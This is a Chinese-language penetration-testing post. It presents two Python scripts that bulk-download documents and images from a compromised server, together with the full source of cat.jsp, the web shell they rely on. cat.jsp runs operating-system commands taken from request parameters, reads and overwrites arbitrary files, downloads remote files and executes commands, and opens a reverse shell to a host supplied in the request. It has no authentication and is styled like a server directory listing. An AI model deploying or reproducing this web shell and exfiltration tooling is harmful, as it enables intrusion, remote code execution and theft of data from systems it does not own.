配合cat.jsp批量下载脚本
滲透時有時會出現數據庫連接出錯,但本地有大量導出數據;或數據庫中存儲的圖片等文件保管在本地的情況,這時可能需要批量下載文件。但蟻劍、菜刀乃至冰蝎或一些web shell都缺少有效批量下載的功能,故利用cat.jsp提供的接口,寫了一個很垃圾的py腳本,可以達到穩定下載文件的效果
list-tool.py(保存下載文件列表)
# list-tool.py: reads directory-listing pages that were saved from cat.jsp as
# static HTML files and writes, per listed directory, a text file naming the
# entries whose names contain one of a few document/image substrings.
# This script only touches local files; it makes no network requests itself.
import os
from bs4 import BeautifulSoup

# Folder holding the static HTML pages saved from cat.jsp (the author notes
# that saved pages are read instead of crawling the listing directly).
local_html_path = "D:\\sploitInfo\\tpage\\"
# Folder where the per-directory lists of downloadable files are written.
local_list_path = "D:\\sploitInfo\\tlist\\"
# Folder under which one sub-folder per listed directory is created.
local_dump_path = "D:\\sploitInfo\\tdump\\"


def read_list(file):
    """Parse one saved listing page and hand the matching names to down_list.

    Args:
        file: name of an HTML file inside local_html_path.

    Any exception raised while opening or parsing the page is swallowed; in
    that case whatever was collected so far is used and ``id`` keeps the
    value it had when the exception occurred ("0" if the heading was never
    parsed).
    """
    filelist = []
    id = "0"
    try:
        cat_page = open(local_html_path + file, "rb")
        soup = BeautifulSoup(cat_page, "html.parser")
        # The page heading is expected to carry the listed directory path.
        fullpath = str(soup.find("h1").text)
        # Index where the listed path starts: first "for" plus four characters.
        len = fullpath.find("for")+4
        # Replace "/" and ":" so the path can be used as a Windows file name.
        id = fullpath[len:].replace("/", "-").replace(":", "@")
        tr_list = soup.find_all("tr")
        # Drop the first table row (the column headings in the cat.jsp listing).
        tr_list.remove(tr_list[0])
        for tr in tr_list:
            # First <tt> in a row; in the cat.jsp listing that is the file name.
            tt = tr.find("tt")
            # Substring test anywhere in the name, not an extension test.
            if str(tt.text).find("pdf") != -1 or str(tt.text).find("doc") != -1 or str(tt.text).find("jpg") != -1 or str(tt.text).find("docx") != -1:
                filelist.append(str(tt.text))
    except:
        pass
    print(filelist)
    try:
        # One dump folder per listed directory; an existing folder is ignored.
        os.mkdir(local_dump_path+id+"")
    except:
        pass
    down_list(filelist, id)


def down_list(filelist, id):
    """Write the names in filelist to local_list_path/<id>.txt, one per "\\r"."""
    listfile = open(local_list_path + id + ".txt", "w")
    for file in filelist:
        listfile.write(file + "\r")
    listfile.close()


def get_htmllist_file():
    """Return one list of file names per directory walked under local_html_path."""
    html_list = []
    for root, dir, file in os.walk(local_html_path):
        html_list.append(file)
    print(html_list)
    return html_list


if __name__ == '__main__':
    # read_list("cat1.html")
    html_list = get_htmllist_file()
    # html_list is a list of lists, hence the nested loop.
    for html_root in html_list:
        for html_file in html_root:
            read_list(html_file)
file-tool.py(下載文件)
# file-tool.py: for every list file written by list-tool.py, requests each named
# file through the cat.jsp "download" action and stores the response body under
# local_dump_path.
# NOTE(detection): every fetch is a plain GET whose query string carries
# action=download, p=<directory> and fileName=<name>, issued one after another
# with a 0.5 s pause between them, so a run is presumably visible as a burst of
# such requests in the web server's access log.
import os
from time import sleep
import requests
import selenium
from bs4 import BeautifulSoup

# selenium, BeautifulSoup and local_html_path are not referenced in this listing.
local_html_path = "D:\\sploitInfo\\page\\"
local_list_path = "D:\\sploitInfo\\tlist\\"
local_dump_path = "D:\\sploitInfo\\tdump\\"
# Base URL of the download action; the host is masked as "**" by the author.
url = "http://**/cat.jsp?action=download&p="


def read_list(filename):
    """Load one list file and return ``[[root], [names...]]``.

    Args:
        filename: name of a ``.txt`` file inside local_list_path.

    ``root`` is the file name without ".txt". Each line has its "\\n"
    removed; errors while reading lines are swallowed.
    """
    fileroot = []
    filelist = []
    fileinfo = []
    file = open(local_list_path + filename)
    fileroot.append(filename.replace(".txt", ""))
    try:
        for line in file.readlines():
            filelist.append(line.replace("\n", ""))
    except:
        pass
    fileinfo.append(fileroot)
    fileinfo.append(filelist)
    return fileinfo


def get_response(url):
    """Issue a GET request for url and return the requests response object."""
    response = requests.get(url)
    return response


def download_file(root, rooturl, filename):
    """Fetch one file and write it to local_dump_path/<root>/<filename>.

    Returns False only when the local file already exists (nothing is
    requested in that case). Returns True both after a successful write and
    after any exception, so the caller pauses in either case.
    """
    try:
        local_file_name = local_dump_path + root + "\\" + filename
        if(os.path.exists(local_file_name)):
            # Already present locally: report in yellow and skip the request.
            print("\033[33m存在了" + "\033[30m", end=" ")
            return False
        response = get_response(rooturl + filename)
        file = open(local_file_name, "wb")
        file.write(response.content)
        file.close()
        print(filename + ": 下載成功", end=" ")
        return True
    except:
        # Any failure is reported in red; the exception itself is discarded.
        print("\033[31m" + filename + ": 下載失敗", end=" ")
        print("\033[30m", end="")
        return True


def get_cat_list():
    """Return read_list() results for every file found under local_list_path."""
    all_filelist = []
    for root, dir, file in os.walk(local_list_path):
        for ifile in file:
            all_filelist.append(read_list(ifile))
    return all_filelist


if __name__ == '__main__':
    # Each entry is indexed as [0][0] (directory id) and [1] (file names),
    # which matches the structure read_list() returns.
    for ifilelist in all_fileinfo:
        fileroot = ifilelist[0][0]
        filelist = ifilelist[1]
        print("--------------------進(jìn)入" + fileroot + "目錄---------------------------------")
        count = len(filelist)
        now = 0
        for file in filelist:
            # Turn the Windows-safe id back into the original path.
            rooturl = url + fileroot.replace("@", ":").replace("-", "/") + "&fileName="
            bool = download_file(fileroot, rooturl, file)
            now += 1
            # Progress as a percentage of the current directory's list.
            print("(" + "%.2f"%(now/count*100) + "%" + ")")
            if bool:
                # Pause between requests; the author's stated reason is anti-crawler defenses.
                sleep(0.5)
以及cat.jsp(其實可以自己寫一個下載文件的接口就好,懶。。)
<%--
  cat.jsp: a single JSP page that, depending on the "action" request parameter,
  lists a directory, shows or overwrites a file, streams a file or a zipped
  directory to the client, fetches a URL to a local path, runs an operating-system
  command, or opens an outbound socket that executes what it receives.
  NOTE(review): nothing in this page checks who the caller is before acting on
  the request parameters. Request parameters read by the code: action, p,
  fileName, path, url, cmd, host, port, file, data. Action values handled:
  shell, downloadL, exec, cat, auto, download, saveFile, and get (or no action)
  for browsing.
--%>
<%@page import="java.util.zip.ZipEntry"%>
<%@page import="java.util.zip.ZipOutputStream"%>
<%@ page language="java" pageEncoding="UTF-8"%>
<%@page import="java.util.*"%>
<%@page import="java.text.SimpleDateFormat"%>
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%!
static String encoding = "UTF-8";
static{
    // Use the JVM's "sun.jnu.encoding" property when it is non-empty.
    encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;
}

/**
 * Convert an exception to a string containing its full stack trace.
 * @param e the exception to render
 * @return the stack trace text
 */
static String exceptionToString(Exception e) {
    StringWriter sw = new StringWriter();
    e.printStackTrace(new PrintWriter(sw, true));
    return sw.toString();
}

/**
 * Get the system file-name encoding.
 * @return the value of the "sun.jnu.encoding" system property
 */
static String getSystemEncoding(){
    return System.getProperty("sun.jnu.encoding");
}

/**
 * Non-empty check.
 *
 * @param obj any object
 * @return false for null or for a value whose trimmed string form is empty
 */
static boolean isNotEmpty(Object obj) {
    if (obj == null) {
        return false;
    }
    return !"".equals(String.valueOf(obj).trim());
}

/**
 * Read an input stream to the end into an in-memory byte buffer.
 * The input stream is not closed here.
 * @param in stream to read
 * @return buffer holding everything that was read
 * @throws IOException
 */
static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    byte[] b = new byte[1024];
    int a = 0;
    while((a = in.read(b))!=-1){
        baos.write(b,0,a);
    }
    return baos;
}

/**
 * Copy a stream to a file; an existing file is overwritten.
 * @param in stream to copy
 * @param path destination file path
 * @throws IOException
 */
static void copyInputStreamToFile(InputStream in,String path) throws IOException{
    FileOutputStream fos = new FileOutputStream(path);
    fos.write(inutStreamToOutputStream(in).toByteArray());
    fos.flush();
    fos.close();
}

/**
 * View file contents, like cat on Linux or type on Windows.
 * The bytes are decoded with the platform default charset.
 * @param path file to read
 * @return the file contents as a string
 * @throws IOException
 */
static String cat(String path) throws IOException {
    return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray());
}

/**
 * Execute an operating-system command. On Windows, commands that cannot be run
 * directly can be run as "cmd /c dir" to execute dir.
 * Only the process's standard output is read; an IOException is returned as
 * stack-trace text instead of being thrown.
 * NOTE(review): the page passes the "cmd" request parameter straight into this
 * method, so the web server process spawning child processes is the observable
 * effect on the host.
 * @param cmd command line to run
 * @return the command's standard output decoded with {@code encoding}
 */
static String exec(String cmd) {
    try {
        return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);
    } catch (IOException e) {
        return exceptionToString(e);
    }
}

/**
 * Download a file to the given location; the file name to save as must be given.
 * @param url source URL
 * @param path local destination path
 * @throws MalformedURLException
 * @throws IOException
 */
static void download(String url,String path) throws MalformedURLException, IOException{
    copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path);
}

/**
 * Connect to a remote port and provide an entry point for local command execution.
 * NOTE(review): this is an outbound TCP connection from the server JVM to the
 * host and port taken from the request; it runs whoami first and then executes
 * each chunk read from the socket until the peer closes it.
 * @param host remote host
 * @param port remote port
 * @throws UnknownHostException
 * @throws IOException
 */
static void shell(String host,int port) throws UnknownHostException, IOException{
    Socket s = new Socket(host,port);
    OutputStream out = s.getOutputStream();
    InputStream in = s.getInputStream();
    out.write(("User:\t"+exec("whoami")).getBytes());
    int a = 0;
    byte[] b = new byte[1024];
    while((a=in.read(b))!=-1){
        out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8"));
    }
}

/**
 * Download a remote file and execute a command; the downloaded file is deleted
 * once the command has finished.
 * @param url source URL
 * @param fileName local name to save the download as
 * @param cmd command line to run after the download
 * @return the command's output
 * @throws MalformedURLException
 * @throws IOException
 */
static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{
    download(url, fileName);
    String out = exec(cmd);
    new File(fileName).delete();
    return out;
}

/**
 * Write a string to a file, overwriting any existing file.
 * @param file destination path
 * @param data text to write, encoded with the platform default charset
 * @throws IOException
 */
static void saveFile(String file,String data) throws IOException{
    copyInputStreamToFile(new ByteArrayInputStream(data.getBytes()), file);
}

/**
 * File compression: add a file, or recursively every file below a readable
 * directory, to the zip stream. Entries are named by file name only.
 * @throws IOException
 */
static void zipFile(ZipOutputStream zos,File file) throws IOException{
    if(file.isDirectory() && file.canRead()){
        File[] files = file.listFiles();
        for(File f:files){
            zipFile(zos, f);
        }
    }else{
        ZipEntry z = new ZipEntry(file.getName());
        zos.putNextEntry(z);
        zos.write(inutStreamToOutputStream(new FileInputStream(file)).toByteArray());
        zos.closeEntry();
    }
}

/**
 * Zip a file or directory into the given in-memory buffer.
 * @throws IOException
 */
static void zip(ByteArrayOutputStream out,File file) throws IOException{
    ZipOutputStream zos = new ZipOutputStream(out);
    zipFile(zos,file);
}
%>
<%-- The title and the footer both print the container's server-info string and the
     styling resembles a container-generated directory listing (presumably so the
     page does not stand out; confirm against the container's own listing page). --%>
<html>
<head>
<title><%=application.getServerInfo() %></title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<STYLE>
H1 {color: white;background-color: #525D76;font-size: 22px;}
H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;}
BODY {font-family: Tahoma, Arial, sans-serif;font-size:12px;color: black;background-color: white;}
A {color: black;}
HR {color: #525D76;}
</STYLE>
<script>
function get(p){
    document.getElementById('p').value = p;
    document.getElementById('action').value = "get";
    document.getElementById('fm').submit();
}
function saveFile(){
    document.getElementById('action').value = "saveFile";
    document.getElementById('fm').submit();
}
</script>
</head>
<body>
<%
try{
    String action = request.getParameter("action");
    // "p" selects the path; without it the web application's real root (or ".") is used.
    String path = isNotEmpty(request.getParameter("p"))?request.getParameter("p"):new File((isNotEmpty(application.getRealPath("/"))?application.getRealPath("/"):".")).getCanonicalPath();
    // Browsing and saving go through this POST form; download links below are GET URLs.
    out.println("<form action=\"\" method=\"post\" id=\"fm\">");
    if(isNotEmpty(action) && !"get".equalsIgnoreCase(action)){
        // Dispatch on the action value; every argument comes from the request unchanged.
        if("shell".equalsIgnoreCase(action)){
            shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));
        }else if("downloadL".equalsIgnoreCase(action)){
            download(request.getParameter("url"), request.getParameter("path"));
            out.println("文件下載成功.");
        }else if("exec".equalsIgnoreCase(action)){
            out.println("<h1>命令執(zhí)行:</h1>");
            out.println("<pre>"+exec(request.getParameter("cmd"))+"</pre>");
        }else if("cat".equalsIgnoreCase(action)){
            out.println("<h1>文件查看:</h1>");
            out.println("<pre>"+cat(request.getParameter("path"))+"</pre>");
        }else if("auto".equalsIgnoreCase(action)){
            out.println("<h1>Auto:</h1>");
            out.println("<pre>"+auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd"))+"</pre>");
        }else if("download".equalsIgnoreCase(action)){
            // Stream path/fileName to the client; a directory is zipped in memory first.
            response.setContentType("application/x-download");
            File file = new File(path,request.getParameter("fileName"));
            String fileName = file.isDirectory() ? file.getName()+".zip":file.getName();
            response.setHeader("Content-Disposition", "attachment; filename="+fileName);
            BufferedOutputStream bos = new BufferedOutputStream(response.getOutputStream());
            if(file.isDirectory()){
                ByteArrayOutputStream baos = new ByteArrayOutputStream();
                zip(baos, file);
                bos.write(baos.toByteArray());
                baos.close();
            }else{
                InputStream in = new FileInputStream(file);
                int len;
                byte[] buf = new byte[1024];
                while ((len = in.read(buf)) > 0) {
                    bos.write(buf, 0, len);
                }
                in.close();
            }
            bos.close();
            // The binary body has already been written, so the JSP writer is
            // cleared and replaced before returning.
            out.clear();
            out = pageContext.pushBody();
            return ;
        }else if("saveFile".equalsIgnoreCase(action)){
            String file = request.getParameter("file");
            String data = request.getParameter("data");
            if(isNotEmpty(file) && isNotEmpty(data)){
                // Both parameters are re-decoded from ISO-8859-1 bytes as UTF-8 before writing.
                saveFile(new String(file.getBytes("ISO-8859-1"),"utf-8"),new String(data.getBytes("ISO-8859-1"),"utf-8"));
                out.println("<script>history.back(-1);alert('ok');</script>");
            }
        }
    }else{
        // No action, or action=get: show a directory listing or a file editor for path.
        File file = new File(path);
        if(file.isDirectory()){
%>
<h1>Directory Listing For <%=path%></h1>
<HR size="1" noshade="noshade">
<table width="100%" cellspacing="0" cellpadding="5" align="center">
<tr>
<td align="left"><font size="+1"><strong>文件名</strong></font></td>
<td align="center"><font size="+1"><strong>文件大小</strong></font></td>
<td align="center"><font size="+1"><strong>文件下載</strong></font></td>
<td align="right"><font size="+1"><strong>最后修改時間</strong></font></td>
</tr>
<%
            // The parent directory ("..") is listed first, then the directory's entries.
            List<File> ls = new ArrayList<File>();
            ls.add(new File(file,".."));
            ls.addAll(Arrays.asList(file.listFiles()));
            for(int i = 0; i < ls.size(); i++){
                File f = ls.get(i);
                String fileCanonicalPath = f.getCanonicalPath().replaceAll("\\\\","/");
                // One row per entry: name (navigates via get()), size, a GET download
                // link carrying action, p and fileName in the query string, and mtime.
                // Names and paths are written into the HTML without escaping.
                out.println("<tr "+((i%2!=0)?"bgcolor=\"#eeeeee\"":"")+"><td align=\"left\"> <a href=\"javascript:get('"+(f.getCanonicalPath().replaceAll("\\\\","/"))+"');\"><tt>"+f.getName()+"</tt></a></td><td align=\"center\"><tt>"+(f.length()/1000)+"KB</tt></td><td align=\"center\"><a href=\""+request.getContextPath()+request.getServletPath()+"?action=download&p="+path+"&fileName="+f.getName()+"\"><tt>下載</tt></a></td><td align=\"right\"><tt>"+new SimpleDateFormat("yyyy-MM-dd hh:mm:ss").format(new Date(f.lastModified())) +"</tt></td></tr>");
            }
        }else{
            // path is a file: show its contents in an editable form that posts to saveFile.
            out.println("<h1>文件編輯:</h1>");
            out.println("File:<input type=\"text\" style=\"width:600px;\" name=\"file\" value=\""+path+"\" /><input type=\"button\" style=\"margin-left:20px;\" value=\"保存\" onclick=\"saveFile()\" /><span id=\"result\"></span><br/><br/>");
            out.println("<textarea style=\"width:100%;height:500px;\" name=\"data\">"+cat(path)+"</textarea>");
        }
    }
    out.println("<input type=\"hidden\" name=\"p\" id=\"p\" value=\""+path+"\"/><input type=\"hidden\" name=\"action\" id=\"action\" value=\"get\" /></form></table>");
    out.println("<HR size=\"1\" noshade=\"noshade\"><h3>"+application.getServerInfo()+"</h3></body></html>");
}catch(Exception e){
    // Any failure is shown to the caller as a full stack trace.
    out.println("<pre>"+exceptionToString(e)+"</pre>");
}
%>
over